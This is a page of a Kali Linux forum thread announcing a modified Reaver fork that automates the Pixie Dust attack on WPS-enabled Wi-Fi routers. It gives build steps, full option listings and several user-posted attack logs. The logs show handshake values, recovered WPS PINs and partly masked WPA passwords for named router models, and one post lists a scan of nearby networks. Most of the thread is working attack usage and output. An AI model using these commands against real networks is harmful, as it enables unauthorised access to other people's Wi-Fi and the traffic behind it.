Page 1 of 3 123 LastLast
Results 1 to 50 of 107

Thread: Reaver modfication for Pixie Dust Attack

  1. #1
    Join Date
    2015-Apr
    Posts
    39

    Reaver modfication for Pixie Dust Attack

    Hello

    The community has made modifications in reaver for him to do the pixie dust attack and automate the process to recover the pin.

    Other attacks were implemented (Pin Generator) and some improvements have been made.

    The development is constant and anyone is welcome to help



    Here is our contribution

    GitHub
    https://github.com/t6x/reaver-wps-fork-t6x



    Overview

    reaver-wps-fork-t6x is a modification done from a fork of reaver (ht tps://code.google.com/p/reaver-wps-fork/)

    This modified version uses the attack Pixie Dust to find the correct pin number of wps

    The attack used in this version was developed by Wiire (ht tps://github.com/wiire/pixiewps)



    Install Required Libraries and Tools

    Libraries for reaver

    Code:
    sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
    Tools

    Code:
    You must have installed the pixiewps created by Wiire (ht tps://github.com/wiire/pixiewps)


    Compile and Install

    Code:
    Build Reaver
    
          cd reaver-wps-fork-t6x-master
          cd src
          ./configure
          make
    
    Install Reaver
    
          sudo make install


    Usage - Reaver

    Code:
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    Required Arguments:
            -i, --interface=<wlan>          Name of the monitor-mode interface to use
            -b, --bssid=<mac>               BSSID of the target AP
    
    Optional Arguments:
            -m, --mac=<mac>                 MAC of the host system
            -e, --essid=<ssid>              ESSID of the target AP
            -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
            -o, --out-file=<file>           Send output to a log file [stdout]
            -s, --session=<file>            Restore a previous session file
            -C, --exec=<command>            Execute the supplied command upon successful pin recovery
            -D, --daemonize                 Daemonize reaver
            -a, --auto                      Auto detect the best advanced options for the target AP
            -f, --fixed                     Disable channel hopping
            -5, --5ghz                      Use 5GHz 802.11 channels
            -v, --verbose                   Display non-critical warnings (-vv for more)
            -q, --quiet                     Only display critical messages
            -K  --pixie-dust=<number>       [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey (Ralink, Broadcom, Realtek)
            -Z, --no-auto-pass              Do NOT run reaver to auto retrieve WPA password if pixiewps attack is successful
            -h, --help                      Show help
    
    Advanced Options:
            -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
            -d, --delay=<seconds>           Set the delay between pin attempts [1]
            -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
            -g, --max-attempts=<num>        Quit after num pin attempts
            -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
            -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
            -t, --timeout=<seconds>         Set the receive timeout period [5]
            -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
            -A, --no-associate              Do not associate with the AP (association must be done by another application)
            -N, --no-nacks                  Do not send NACK messages when out of order packets are received
            -S, --dh-small                  Use small DH keys to improve crack speed
            -L, --ignore-locks              Ignore locked state reported by the target AP
            -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
            -n, --nack                      Target AP always sends a NACK [Auto]
            -w, --win7                      Mimic a Windows 7 registrar [False]
            -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
            -1, --p1-index                  Set initial array index for the first half of the pin [False]
            -2, --p2-index                  Set initial array index for the second half of the pin [False]
            -P, --pixiedust-loop            Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
            -W, --generate-pin              Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
    
    Example:
            reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1

    Option (K)

    Code:
    The -K option 1 runs pixiewps with PKE, PKR, E-Hash1, E-Hash2, E-Nonce and the Authkey. pixiewps will try to attack Ralink, Broadcom and Realtek
        
    *Special note: if you are attacking a Realtek AP, do NOT use small DH Keys (-S)

    Option (P)

    Code:
    Option (-P) in reaver puts reaver into a loop mode that does not do the WPS protocol to or past the M4 message to hopefully avoid lockouts. This is to ONLY be used for PixieHash collecting to use with pixiewps, NOT to 'online' bruteforce pins.
    This option was made with intent of:
    
    - Collecting repetitive hashes for further comparison and or analysis / discovery of new vulnerable chipsets , routers etc..
    
    - Time sensistive attacks where the hash collecting continues repetitively until your time frame is met.
    
    - For scripting purposes of whom want to use a possible lockout preventable way of PixieHash gathering for your Use case.

    Usage - wash

    Code:
    Wash v1.5.2 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    Required Arguments:
            -i, --interface=<iface>              Interface to capture packets on
            -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files
    
    Optional Arguments:
            -c, --channel=<num>                  Channel to listen on [auto]
            -o, --out-file=<file>                Write data to file
            -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
            -D, --daemonize                      Daemonize wash
            -C, --ignore-fcs                     Ignore frame checksum errors
            -5, --5ghz                           Use 5GHz 802.11 channels
            -s, --scan                           Use scan mode
            -u, --survey                         Use survey mode [default]
            -P, --file-output-piped              Allows Wash output to be piped. Example. wash x|y|z...
            -g, --get-chipset                    Pipes output and runs reaver alongside to get chipset
            -h, --help                           Show help
    
    Example:
            wash -i mon0


    Example

    Code:
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire
    
    [+] Switching mon0 to channel 1
    [?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
    [+] Waiting for beacon from A.:9.:D.:....:....:...
    [+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: c6:66:a6:72:37:6d:......
    [P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [P] WPS Model Serial Number: A978FD123BC
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
    [P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
    [+] Sending M2 message
    [P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
    [P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: dd:09:bd:24:......
    [Pixie-Dust][*] PSK2: 77:e0:dd:00:......
    [Pixie-Dust]   [+] WPS pin: 9178....
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: A.:9.:D.:3.:..:..
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '9178....'
    [Reaver Test] [+] WPA PSK: '112233'
    [Reaver Test] [+] AP SSID: '....'

    Code:
    # wash -i mon0 -g -c 2
    XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
    XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U


    Any problem and suggestion, contact someone who is helping in the project
    Last edited by t6_x; 2015-05-05 at 16:22.

  2. #2
    Join Date
    2015-Mar
    Posts
    4
    i like that way you think. it makes everything easier on the long run -good job!

    but get your sources right :

    perfekt example:
    https://forums.kali.org/showthread.p...-WPS-Attack%29

  3. #3
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    hi
    thank you very much for your great contribution!!!!!!
    TNX

  4. #4
    Join Date
    2015-Mar
    Posts
    127
    Awesome Sauce !! Nice job indeed.

    When run from root I get error below. yes I did sudo make install after compile.
    Code:
    root@kali:~# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1 
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    
    [+] Waiting for beacon from 08:**:0C:**:F4:**
    [+] Switching mon0 to channel 1
    [+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 91:80:26:70:44:a0:80:c9:f1:93:f7:f8:44:88:f0:b7
    [P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: e1:21:a3:c4:34:de:bb:59:e2:8c:49:74:58:8e:79:f0:2f:b8:29:07:af:3d:62:2f:2a:9c:9e:61:9e:02:08:f0
    [+] Sending M2 message
    [P] E-Hash1: dc:fc:c2:c3:93:65:d6:15:f1:b6:3d:67:f3:39:61:0f:22:aa:78:a3:5d:41:eb:6d:67:fd:fc:bf:83:d4:f3:ee
    [P] E-Hash2: ad:95:ea:36:96:ec:bc:16:47:b6:b6:d1:49:90:e4:eb:d7:cd:20:ff:84:92:d0:b2:fc:e0:75:37:d8:4d:92:0c
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: 4a:72:15:42:21:4b:69:ef:10:a4:41:bd:df:75:01:a8
    [Pixie-Dust]   [*] PSK2: 24:85:d0:a8:e4:20:c5:9d:04:d7:da:67:a6:df:af:3f
    [Pixie-Dust]   [+] WPS pin: 8127****
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: 08:**:0C:**:F4:**
    [Reaver Test] Channel: 1
    sh: 1: ./reaver: not found
    When run from src directory It works........
    Code:
    root@kali:~/reaver-wps-fork-t6x-master/src# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1 
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    
    [+] Waiting for beacon from 08:**:0C:**:F4:**
    [+] Switching mon0 to channel 1
    [+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: aa:c5:79:80:9d:3b:cc:46:7a:d5:c9:f5:b5:20:ae:bf
    [P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: 0a:6b:15:aa:53:0d:c3:5f:56:bc:46:3a:a1:1a:89:26:ba:51:5b:1b:f6:9f:92:b3:c2:87:61:0b:e8:ce:c1:57
    [+] Sending M2 message
    [P] E-Hash1: 81:7e:70:4a:1e:62:f8:1f:d4:92:f3:60:0d:ea:52:a0:37:ca:75:e3:43:03:ca:fa:2b:60:5d:bf:33:03:9b:d8
    [P] E-Hash2: 82:c1:62:2c:ff:00:81:f6:46:14:44:f3:2f:f8:f1:95:60:73:da:1d:b6:8e:fc:bb:f0:cd:ff:f9:ce:25:76:63
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: dc:64:ee:9b:dc:4e:39:e5:9c:a7:f4:82:d5:b1:e2:8d
    [Pixie-Dust]   [*] PSK2: 1d:7b:f9:0d:9c:0a:d8:a7:68:7e:3f:47:7b:59:e8:f9
    [Pixie-Dust]   [+] WPS pin: 8127****
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin wait ...
    
    [Reaver Test] BSSID: 08:**:0C:**:F4:**
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '8127****'
    [Reaver Test] [+] WPA PSK: 'TG1672GD8****'
    [Reaver Test] [+] AP SSID: 'TG1672GE2'
    Probably my fault, just post my result, great job

  5. #5
    Join Date
    2015-Apr
    Posts
    39
    Probably my fault, just post my result, great job
    ops, forgot to commit to the github lol, is my fault sorry

    Commit done

    sorry for that

    I add a new option (-Z), with the -Z option he does not try to catch the pass automatically, it stops executing when it finishes running the pixiewps

    I will add another option to have an option to output data to file, when you're ready I give commits

    I will improve a bit the initial post

    sorry again.

  6. #6
    Join Date
    2015-Mar
    Posts
    127
    U Fixed it.

    -Z works correctly also

  7. #7
    Job well done =).
    This is a Kali-Linux support forum - not general IT/infosec help.

    Useful Commands: OS, Networking, Hardware, Wi-Fi
    Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
    Hardware: Recommended 802.11 Wireless Cards

    Search: https://www.kali.org/search/
    Documentation: http://docs.kali.org/ (Offline PDF version)
    Bugs Reporting & Tool Requests: https://bugs.kali.org/
    Kali Tool List, Versions & Man Pages: http://tools.kali.org/

  8. #8
    Join Date
    2015-Apr
    Posts
    39
    Thank you very much, g0tmi1k



    New version available

    -P Option of the wash created by t6x(displays the output of the wash with pipes)

    Code:
    root @ kali: ~ / # wash -i mon0 -P
    XX: XX: XX: XX: XX: XX | 1 | -64 | 1.0 | No | Wifi1
    XX: XX: XX: XX: XX: XX | 2 | -53 | 1.0 | No | Wifi2

    -P Option of reaver created by DataHead (M3 Loop)

    Code:
    Reaver remains in the loop M3 stage
    Last edited by t6_x; 2015-04-16 at 04:48.

  9. #9
    Join Date
    2015-Mar
    Posts
    127

    Red face

    Nice work....
    -P option works great, take less screen space if multiple terminals running.
    Code:
    wash -i wlan1mon -P
    00:00:00:00:1E:90| 1|-60|1.0|Yes|DG1600000
    00:00:00:00:62:6C| 1|-55|1.0|No |Kirin00000
    00:00:00:00:46:00| 1|-59|1.0|Yes|DG1600000
    00:00:00:00:5C:C0| 1|-46|1.0|No |DG160000
    00:00:00:00:5B:6F| 1|-64|1.0|No |PS00000
    00:00:00:00:23:97| 1|-63|1.0|No |TH0000
    00:00:00:00:A9:5E| 1|-57|1.0|No |DVW000000
    00:00:00:00:08:86| 4|-58|1.0|Yes|H0000
    00:00:00:00:37:56| 6|-47|1.0|No |133 00000
    00:00:00:00:AD:00| 6|-47|1.0|No |Tomm00000
    00:00:00:00:07:00| 6|-58|1.0|Yes|Tupp000000
    00:00:00:00:AD:18| 6|-62|1.0|No |McP000000
    00:00:00:00:4E:50| 6|-52|1.0|No |DG10000000
    00:00:00:00:52:A1| 6|-57|1.0|No |133 00000
    00:00:00:00:B6:D0| 6|-45|1.0|No |We he0000000
    00:00:00:00:93:21| 8|-55|1.0|No |Trou0000000
    00:00:00:00:A2:70| 9|-52|1.0|No |TG160000000
    00:00:00:00:3E:6B|11|-41|1.0|No |DVW0000000
    00:00:00:00:9F:00|11|-66|1.0|No |SterlingWattersDraperPrice
    00:00:00:00:07:10|11|-47|1.0|Yes|DG0000000
    00:00:00:00:03:D9|11|-55|1.0|No |NET000000
    00:00:00:00:E8:86|11|-54|1.0|No |9060000000
    00:00:00:00:81:F0|11|-49|1.0|Yes|TG0000000
    00:00:00:00:A7:86|11|-30|1.0|No |b0c50000000
    00:00:00:00:45:00|11|-60|1.0|No |Pan000000
    Maybe make change on your fork GitHub page:
    Build Reaver

    cd reaver-1.4 to cd reaver-wps-fork-t6x-master
    cd src
    ./configure
    make

    Install Reaver

    sudo make install
    Also thanks for the credit.... but u typo my name.


    Question/Idea
    if option -K1 fail, does it automatically try -K2 or K3?
    if -K3 fail, does it check -K1 etc?

    or

    user must enter new command line each time?
    Last edited by nuroo; 2015-04-30 at 14:42.

  10. #10
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Another idea... have all the extra stuff print only with verbosity mode selected

    Update: I'm getting a segmentation fault when I use -K 1 and -K 3

    Code:
    root@Kali:~# reaver -i mon0 -c 1 -b B4:75:0E:XX:XX:XX -vv -a -K 3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from B4:75:0E:XX:XX:XX
    [+] Associated with B4:75:0E:XX:XX:XX (ESSID: *****)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 6b:35:4d:6f:05:8e:9c:80:55:68:25:4f:17:42:31:0d
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Belkin International
    [P] WPS Model Number: F9K1105 v2
    [+] Received M1 message
    [P] PKR: dc:4c:e3:b4:b2:4a:d1:e8:39:3c:bf:b8:f1:e6:01:ab:2a:3c:6b:0d:7b:07:71:5c:b9:08:b4:e4:65:c1:4a:0b:71:11:90:24:66:05:57:6a:48:9b:ba:ae:20:20:5b:e2:83:92:b0:9d:bb:d3:7c:9f:44:e7:af:72:50:c2:76:7d:ac:34:62:62:4e:3b:f3:35:7e:e5:03:c2:7d:36:76:df:91:45:71:a0:32:04:0f:9b:92:85:18:0c:d8:c1:d5:e4:fd:17:07:26:47:36:49:37:80:80:e6:14:c9:50:76:3b:7a:38:99:5f:35:96:1c:53:2a:0d:8f:ab:48:b0:1f:1a:21:06:27:41:2b:b0:26:13:79:e7:a9:51:e7:cd:e1:95:f1:c9:a9:7b:84:8c:c5:ea:4e:27:14:bb:30:01:87:a9:d9:c0:07:0d:81:e0:62:a8:38:70:d0:3d:54:8e:49:9c:1c:e8:42:4a:ea:0f:73:f1:a7:80:01:31:e2:14:02:4e
    [P] AuthKey: 03:c2:33:e0:d1:66:13:c1:d8:8f:a5:00:59:db:fc:8e:40:5d:2d:de:d7:8d:b4:97:ea:d9:c0:75:3d:71:c9:37
    [+] Sending M2 message
    [P] E-Hash1: 3a:9e:57:08:f3:fb:e1:ef:13:22:98:34:40:af:ef:cb:f7:00:ba:48:2b:7d:34:18:7f:c0:2d:80:9b:c2:7e:96
    [P] E-Hash2: 3c:70:b6:aa:df:50:a8:e3:c8:e7:20:7e:bd:01:38:2e:63:4f:e4:9f:c8:26:fe:23:0c:2c:e6:67:16:08:e1:71
    Segmentation fault
    Last edited by soxrok2212; 2015-04-14 at 22:50.

  11. #11
    Join Date
    2015-Mar
    Posts
    127
    No segmentation fault for me, however

    If no pin found ok, then exit
    Code:
    root@kali:~# reaver -i wlan3mon -b C4:.............. -vv -a -K3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] p1_index set to 1
    [+] p2_index set to 0
    [+] Restored previous session
    [+] Waiting for beacon from C4:..............
    [+] Switching wlan3mon to channel 1
    [+] Switching wlan3mon to channel 2
    [+] Switching wlan3mon to channel 3
    [+] Switching wlan3mon to channel 4
    [+] Switching wlan3mon to channel 5
    [+] Switching wlan3mon to channel 6
    [+] Associated with C4:.............. (ESSID: TP-*********)
    [+] Starting Cracking Session. Pin count: 1, Max pin attempts: 11000
    [+] Trying pin 00005678.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: dc:71:07:21:ab:fd:d2:8e:9a:63:b0:1c:e3:43:2f:6e
    [P] PKE: 7b:4b:4f:84:3c:94:ef:c9:64:39:c8:f6:43:3d:ce:24:8f:c7:5a:f1:c8:49:e4:b0:29:35:e0:d4:e9:10:ee:a4:85:c6:07:50:98:cf:49:18:a7:31:c3:85:2a:cd:ec:82:57:fd:f6:60:8c:78:18:2b:d4:39:95:04:d8:73:ac:43:60:d9:4d:06:ae:b9:0f:62:47:a6:f9:70:80:79:7d:45:3f:0a:00:fb:d0:44:f2:f7:5b:62:12:5d:7f:ce:4d:e4:5c:d3:47:10:9a:f7:5c:8b:46:a7:93:dc:04:4f:15:7e:e4:3a:77:20:b4:a4:45:a4:6b:9b:a5:61:c0:e9:c3:55:bc:e3:39:8e:82:df:24:1f:15:e7:f1:a9:86:6e:b7:7a:35:a5:26:5a:28:ef:0e:94:39:2c:18:ce:ca:3d:93:a5:b3:a5:80:f3:e7:33:13:ec:88:9c:60:69:b7:04:14:ca:d2:07:b1:7c:cf:67:43:72:0a:66:65:29:90:bf:59:94
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [+] Received M1 message
    [P] PKR: b9:de:9f:be:19:9a:92:78:4b:fc:b1:0f:dc:0d:5b:db:e6:b2:85:c6:96:1d:f1:93:66:59:06:53:7d:62:01:7d:bf:96:3c:8e:ed:c8:e6:08:f1:4a:48:c2:a5:f6:08:51:8e:1b:01:38:69:b0:d4:cd:d9:ef:1d:f0:4e:82:46:b3:cf:19:aa:1c:2e:e5:dc:4e:10:7c:71:c3:69:77:32:fe:2f:27:dc:d9:0e:20:2f:64:55:2d:58:d0:79:ee:dd:7d:70:04:13:62:3f:c3:39:c0:32:f5:83:3c:80:ba:b6:b6:37:9b:89:12:05:65:52:65:ac:e4:1f:fb:2c:31:aa:da:d4:f3:36:b1:04:2e:e0:a8:bd:4d:68:ca:13:98:2b:32:eb:81:ee:7c:e8:8d:ae:95:6e:06:08:4c:b2:f6:cc:26:c7:7a:7b:e3:03:f5:17:30:8a:c7:22:93:5c:79:d9:11:d0:73:8c:37:44:72:33:70:49:c6:ba:3d:0c:50:56:42
    [P] AuthKey: c9:6a:f4:8d:ea:95:40:09:31:59:15:ee:fd:8c:f4:84:2b:e7:6c:b1:89:8f:80:c8:a4:85:71:d4:57:e8:b5:75
    [+] Sending M2 message
    [P] E-Hash1: 32:2d:a3:b9:96:e3:a6:5e:92:ad:93:33:9a:08:00:d9:be:87:b8:a1:ee:9d:70:6f:c3:5d:2e:91:63:ab:d6:dc
    [P] E-Hash2: 55:95:0f:16:3c:33:bb:c8:31:2f:ff:f6:c3:45:09:ee:e3:ba:f9:d6:f9:15:c0:36:69:3b:1c:e2:9d:f8:cd:25
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]
    But if pin found, hangs
    Code:
    root@kali:~# reaver -i wlan3mon -b 8C:.......... -vv -a -K3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] Waiting for beacon from 8C:..........
    [+] Switching wlan3mon to channel 1
    [+] Switching wlan3mon to channel 2
    [+] Switching wlan3mon to channel 3
    [+] Switching wlan3mon to channel 4
    [+] Switching wlan3mon to channel 5
    [+] Switching wlan3mon to channel 6
    [+] Switching wlan3mon to channel 7
    [+] Switching wlan3mon to channel 9
    [+] Associated with 8C:.......... (ESSID: TG167*****)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 2c:62:2f:3c:6f:e9:d4:75:92:a3:d3:e4:59:a0:92:bc
